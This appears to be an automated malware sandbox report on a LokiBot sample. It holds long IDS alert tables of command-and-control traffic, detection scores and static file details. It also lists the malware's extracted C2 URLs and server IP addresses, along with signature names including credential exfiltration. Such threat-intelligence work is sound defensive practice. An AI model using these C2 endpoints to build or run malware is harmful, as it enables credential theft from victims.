                  2024-12-22T14:12:24.298560+010020216411A Network Trojan was detected192.168.2.54973092.113.16.6380TCP
                  2024-12-22T14:12:26.270738+010020216411A Network Trojan was detected192.168.2.54973792.113.16.6380TCP
                  2024-12-22T14:12:28.206249+010020216411A Network Trojan was detected192.168.2.54974492.113.16.6380TCP
                  2024-12-22T14:12:30.193986+010020216411A Network Trojan was detected192.168.2.54975092.113.16.6380TCP
                  2024-12-22T14:12:32.170808+010020216411A Network Trojan was detected192.168.2.54975692.113.16.6380TCP
                  2024-12-22T14:12:34.048387+010020216411A Network Trojan was detected192.168.2.54976292.113.16.6380TCP
                  2024-12-22T14:12:35.977485+010020216411A Network Trojan was detected192.168.2.54976892.113.16.6380TCP
                  2024-12-22T14:12:37.922549+010020216411A Network Trojan was detected192.168.2.54977192.113.16.6380TCP
                  2024-12-22T14:12:39.913797+010020216411A Network Trojan was detected192.168.2.54977492.113.16.6380TCP
                  2024-12-22T14:12:41.792852+010020216411A Network Trojan was detected192.168.2.54977992.113.16.6380TCP
                  2024-12-22T14:12:43.778745+010020216411A Network Trojan was detected192.168.2.54978592.113.16.6380TCP
                  2024-12-22T14:12:45.725102+010020216411A Network Trojan was detected192.168.2.54979192.113.16.6380TCP
                  2024-12-22T14:12:47.702297+010020216411A Network Trojan was detected192.168.2.54979792.113.16.6380TCP
                  2024-12-22T14:12:49.654095+010020216411A Network Trojan was detected192.168.2.54980392.113.16.6380TCP
                  2024-12-22T14:12:51.781467+010020216411A Network Trojan was detected192.168.2.54980892.113.16.6380TCP
                  2024-12-22T14:12:53.776209+010020216411A Network Trojan was detected192.168.2.54981392.113.16.6380TCP
                  2024-12-22T14:12:55.748800+010020216411A Network Trojan was detected192.168.2.54981992.113.16.6380TCP
                  2024-12-22T14:12:57.639002+010020216411A Network Trojan was detected192.168.2.54982592.113.16.6380TCP
                  2024-12-22T14:12:59.653024+010020216411A Network Trojan was detected192.168.2.54982892.113.16.6380TCP
                  2024-12-22T14:13:01.607262+010020216411A Network Trojan was detected192.168.2.54983492.113.16.6380TCP
                  2024-12-22T14:13:03.485305+010020216411A Network Trojan was detected192.168.2.54984192.113.16.6380TCP
                  2024-12-22T14:13:05.648440+010020216411A Network Trojan was detected192.168.2.54984792.113.16.6380TCP
                  2024-12-22T14:13:07.852654+010020216411A Network Trojan was detected192.168.2.54985392.113.16.6780TCP
                  2024-12-22T14:13:09.825571+010020216411A Network Trojan was detected192.168.2.54985992.113.16.6780TCP
                  2024-12-22T14:13:11.829832+010020216411A Network Trojan was detected192.168.2.54986492.113.16.6780TCP
                  2024-12-22T14:13:13.746542+010020216411A Network Trojan was detected192.168.2.54987092.113.16.6780TCP
                  2024-12-22T14:13:15.701197+010020216411A Network Trojan was detected192.168.2.54987592.113.16.6780TCP
                  2024-12-22T14:13:17.691250+010020216411A Network Trojan was detected192.168.2.54987992.113.16.6780TCP
                  2024-12-22T14:13:19.580922+010020216411A Network Trojan was detected192.168.2.54988592.113.16.6780TCP
                  2024-12-22T14:13:21.563411+010020216411A Network Trojan was detected192.168.2.54988992.113.16.6780TCP
                  2024-12-22T14:13:23.430650+010020216411A Network Trojan was detected192.168.2.54989592.113.16.6780TCP
                  2024-12-22T14:13:25.406832+010020216411A Network Trojan was detected192.168.2.54990192.113.16.6780TCP
                  2024-12-22T14:13:27.394770+010020216411A Network Trojan was detected192.168.2.54990792.113.16.6780TCP
                  2024-12-22T14:13:29.361059+010020216411A Network Trojan was detected192.168.2.54991392.113.16.6780TCP
                  2024-12-22T14:13:31.366487+010020216411A Network Trojan was detected192.168.2.54991992.113.16.6780TCP
                  2024-12-22T14:13:33.340412+010020216411A Network Trojan was detected192.168.2.54992592.113.16.6780TCP
                  2024-12-22T14:13:35.225031+010020216411A Network Trojan was detected192.168.2.54993092.113.16.6780TCP
                  2024-12-22T14:13:37.184150+010020216411A Network Trojan was detected192.168.2.54993492.113.16.6780TCP
                  2024-12-22T14:13:39.191137+010020216411A Network Trojan was detected192.168.2.54994092.113.16.6780TCP
                  2024-12-22T14:13:41.217229+010020216411A Network Trojan was detected192.168.2.54994492.113.16.6780TCP
                  2024-12-22T14:13:43.173669+010020216411A Network Trojan was detected192.168.2.54995092.113.16.6780TCP
                  2024-12-22T14:13:45.134599+010020216411A Network Trojan was detected192.168.2.54995592.113.16.6780TCP
                  2024-12-22T14:13:47.131865+010020216411A Network Trojan was detected192.168.2.54995992.113.16.6780TCP
                  2024-12-22T14:13:49.082293+010020216411A Network Trojan was detected192.168.2.54996492.113.16.6780TCP
                  2024-12-22T14:13:50.975180+010020216411A Network Trojan was detected192.168.2.54997092.113.16.6780TCP
                  2024-12-22T14:13:52.942630+010020216411A Network Trojan was detected192.168.2.54997692.113.16.6780TCP
                  2024-12-22T14:13:55.208169+010020216411A Network Trojan was detected192.168.2.54998292.113.16.6780TCP
                  2024-12-22T14:13:57.115154+010020216411A Network Trojan was detected192.168.2.54998892.113.16.6780TCP
                  2024-12-22T14:13:59.078913+010020216411A Network Trojan was detected192.168.2.54999392.113.16.6780TCP
                  2024-12-22T14:14:01.034852+010020216411A Network Trojan was detected192.168.2.54999892.113.16.6780TCP
                  2024-12-22T14:14:02.984416+010020216411A Network Trojan was detected192.168.2.55000292.113.16.6780TCP
                  2024-12-22T14:14:04.984506+010020216411A Network Trojan was detected192.168.2.55000892.113.16.6780TCP
                  2024-12-22T14:14:07.223056+010020216411A Network Trojan was detected192.168.2.55001492.113.16.6780TCP
                  2024-12-22T14:14:09.389083+010020216411A Network Trojan was detected192.168.2.55002092.113.16.6780TCP
                  2024-12-22T14:14:11.258701+010020216411A Network Trojan was detected192.168.2.55002692.113.16.6780TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-22T14:12:08.679463+010028257661Malware Command and Control Activity Detected192.168.2.54970492.113.16.6380TCP
                  2024-12-22T14:12:10.630928+010028257661Malware Command and Control Activity Detected192.168.2.54970592.113.16.6380TCP
                  2024-12-22T14:12:12.555175+010028257661Malware Command and Control Activity Detected192.168.2.54970692.113.16.6380TCP
                  2024-12-22T14:12:14.486390+010028257661Malware Command and Control Activity Detected192.168.2.54970792.113.16.6380TCP
                  2024-12-22T14:12:16.506905+010028257661Malware Command and Control Activity Detected192.168.2.54970992.113.16.6380TCP
                  2024-12-22T14:12:18.490175+010028257661Malware Command and Control Activity Detected192.168.2.54971592.113.16.6380TCP
                  2024-12-22T14:12:20.454277+010028257661Malware Command and Control Activity Detected192.168.2.54971692.113.16.6380TCP
                  2024-12-22T14:12:22.413385+010028257661Malware Command and Control Activity Detected192.168.2.54972392.113.16.6380TCP
                  2024-12-22T14:12:24.298560+010028257661Malware Command and Control Activity Detected192.168.2.54973092.113.16.6380TCP
                  2024-12-22T14:12:26.270738+010028257661Malware Command and Control Activity Detected192.168.2.54973792.113.16.6380TCP
                  2024-12-22T14:12:28.206249+010028257661Malware Command and Control Activity Detected192.168.2.54974492.113.16.6380TCP
                  2024-12-22T14:12:30.193986+010028257661Malware Command and Control Activity Detected192.168.2.54975092.113.16.6380TCP
                  2024-12-22T14:12:32.170808+010028257661Malware Command and Control Activity Detected192.168.2.54975692.113.16.6380TCP
                  2024-12-22T14:12:34.048387+010028257661Malware Command and Control Activity Detected192.168.2.54976292.113.16.6380TCP
                  2024-12-22T14:12:35.977485+010028257661Malware Command and Control Activity Detected192.168.2.54976892.113.16.6380TCP
                  2024-12-22T14:12:37.922549+010028257661Malware Command and Control Activity Detected192.168.2.54977192.113.16.6380TCP
                  2024-12-22T14:12:39.913797+010028257661Malware Command and Control Activity Detected192.168.2.54977492.113.16.6380TCP
                  2024-12-22T14:12:41.792852+010028257661Malware Command and Control Activity Detected192.168.2.54977992.113.16.6380TCP
                  2024-12-22T14:12:43.778745+010028257661Malware Command and Control Activity Detected192.168.2.54978592.113.16.6380TCP
                  2024-12-22T14:12:45.725102+010028257661Malware Command and Control Activity Detected192.168.2.54979192.113.16.6380TCP
                  2024-12-22T14:12:47.702297+010028257661Malware Command and Control Activity Detected192.168.2.54979792.113.16.6380TCP
                  2024-12-22T14:12:49.654095+010028257661Malware Command and Control Activity Detected192.168.2.54980392.113.16.6380TCP
                  2024-12-22T14:12:51.781467+010028257661Malware Command and Control Activity Detected192.168.2.54980892.113.16.6380TCP
                  2024-12-22T14:12:53.776209+010028257661Malware Command and Control Activity Detected192.168.2.54981392.113.16.6380TCP
                  2024-12-22T14:12:55.748800+010028257661Malware Command and Control Activity Detected192.168.2.54981992.113.16.6380TCP
                  2024-12-22T14:12:57.639002+010028257661Malware Command and Control Activity Detected192.168.2.54982592.113.16.6380TCP
                  2024-12-22T14:12:59.653024+010028257661Malware Command and Control Activity Detected192.168.2.54982892.113.16.6380TCP
                  2024-12-22T14:13:01.607262+010028257661Malware Command and Control Activity Detected192.168.2.54983492.113.16.6380TCP
                  2024-12-22T14:13:03.485305+010028257661Malware Command and Control Activity Detected192.168.2.54984192.113.16.6380TCP
                  2024-12-22T14:13:05.648440+010028257661Malware Command and Control Activity Detected192.168.2.54984792.113.16.6380TCP
                  2024-12-22T14:13:07.852654+010028257661Malware Command and Control Activity Detected192.168.2.54985392.113.16.6780TCP
                  2024-12-22T14:13:09.825571+010028257661Malware Command and Control Activity Detected192.168.2.54985992.113.16.6780TCP
                  2024-12-22T14:13:11.829832+010028257661Malware Command and Control Activity Detected192.168.2.54986492.113.16.6780TCP
                  2024-12-22T14:13:13.746542+010028257661Malware Command and Control Activity Detected192.168.2.54987092.113.16.6780TCP
                  2024-12-22T14:13:15.701197+010028257661Malware Command and Control Activity Detected192.168.2.54987592.113.16.6780TCP
                  2024-12-22T14:13:17.691250+010028257661Malware Command and Control Activity Detected192.168.2.54987992.113.16.6780TCP
                  2024-12-22T14:13:19.580922+010028257661Malware Command and Control Activity Detected192.168.2.54988592.113.16.6780TCP
                  2024-12-22T14:13:21.563411+010028257661Malware Command and Control Activity Detected192.168.2.54988992.113.16.6780TCP
                  2024-12-22T14:13:23.430650+010028257661Malware Command and Control Activity Detected192.168.2.54989592.113.16.6780TCP
                  2024-12-22T14:13:25.406832+010028257661Malware Command and Control Activity Detected192.168.2.54990192.113.16.6780TCP
                  2024-12-22T14:13:27.394770+010028257661Malware Command and Control Activity Detected192.168.2.54990792.113.16.6780TCP
                  2024-12-22T14:13:29.361059+010028257661Malware Command and Control Activity Detected192.168.2.54991392.113.16.6780TCP
                  2024-12-22T14:13:31.366487+010028257661Malware Command and Control Activity Detected192.168.2.54991992.113.16.6780TCP
                  2024-12-22T14:13:33.340412+010028257661Malware Command and Control Activity Detected192.168.2.54992592.113.16.6780TCP
                  2024-12-22T14:13:35.225031+010028257661Malware Command and Control Activity Detected192.168.2.54993092.113.16.6780TCP
                  2024-12-22T14:13:37.184150+010028257661Malware Command and Control Activity Detected192.168.2.54993492.113.16.6780TCP
                  2024-12-22T14:13:39.191137+010028257661Malware Command and Control Activity Detected192.168.2.54994092.113.16.6780TCP
                  2024-12-22T14:13:41.217229+010028257661Malware Command and Control Activity Detected192.168.2.54994492.113.16.6780TCP
                  2024-12-22T14:13:43.173669+010028257661Malware Command and Control Activity Detected192.168.2.54995092.113.16.6780TCP
                  2024-12-22T14:13:45.134599+010028257661Malware Command and Control Activity Detected192.168.2.54995592.113.16.6780TCP
                  2024-12-22T14:13:47.131865+010028257661Malware Command and Control Activity Detected192.168.2.54995992.113.16.6780TCP
                  2024-12-22T14:13:49.082293+010028257661Malware Command and Control Activity Detected192.168.2.54996492.113.16.6780TCP
                  2024-12-22T14:13:50.975180+010028257661Malware Command and Control Activity Detected192.168.2.54997092.113.16.6780TCP
                  2024-12-22T14:13:52.942630+010028257661Malware Command and Control Activity Detected192.168.2.54997692.113.16.6780TCP
                  2024-12-22T14:13:55.208169+010028257661Malware Command and Control Activity Detected192.168.2.54998292.113.16.6780TCP
                  2024-12-22T14:13:57.115154+010028257661Malware Command and Control Activity Detected192.168.2.54998892.113.16.6780TCP
                  2024-12-22T14:13:59.078913+010028257661Malware Command and Control Activity Detected192.168.2.54999392.113.16.6780TCP
                  2024-12-22T14:14:01.034852+010028257661Malware Command and Control Activity Detected192.168.2.54999892.113.16.6780TCP
                  2024-12-22T14:14:02.984416+010028257661Malware Command and Control Activity Detected192.168.2.55000292.113.16.6780TCP
                  2024-12-22T14:14:04.984506+010028257661Malware Command and Control Activity Detected192.168.2.55000892.113.16.6780TCP
                  2024-12-22T14:14:07.223056+010028257661Malware Command and Control Activity Detected192.168.2.55001492.113.16.6780TCP
                  2024-12-22T14:14:09.389083+010028257661Malware Command and Control Activity Detected192.168.2.55002092.113.16.6780TCP
                  2024-12-22T14:14:11.258701+010028257661Malware Command and Control Activity Detected192.168.2.55002692.113.16.6780TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: Hh8hqqbu9X.exeAvira: detected
                  Source: 00000000.00000002.2118642185.0000000003300000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
                  Source: Hh8hqqbu9X.exeReversingLabs: Detection: 81%
                  Source: Hh8hqqbu9X.exeVirustotal: Detection: 78%Perma Link
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: Hh8hqqbu9X.exeJoe Sandbox ML: detected
                  Source: Hh8hqqbu9X.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  Source: Hh8hqqbu9X.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: vQEIiVK6q7yMZDUH.pdb source: Hh8hqqbu9X.exe
                  Source: Binary string: vQEIiVK6q7yMZDUH.pdbxf source: Hh8hqqbu9X.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,1_2_00403D74

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49709 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49709 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49709 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49771 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49771 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49771 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49707 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49707 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49737 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49737 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49737 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49715 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49715 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49771 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49715 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49706 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49771 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49706 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49730 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49706 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49730 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49730 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49709 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49723 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49730 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49730 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49706 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49706 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49709 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49723 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49705 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49707 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49705 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49737 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49737 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49762 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49707 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49825 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49768 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49707 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49774 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49762 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49808 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49723 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49834 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49834 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49834 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49723 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49723 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49704 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49704 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49756 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49791 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49791 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49791 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49762 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49791 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49715 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49791 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49785 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49864 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49785 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49785 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49847 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49847 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49870 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49870 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49870 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49756 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49828 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49762 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49756 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49828 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49864 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49825 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49864 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49704 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49705 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49768 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49768 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49715 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49828 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49762 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49716 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49768 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49756 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49768 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49847 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:49705 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49808 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49774 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49797 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49797 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49825 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49716 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49864 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49716 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49864 -> 92.113.16.67:80
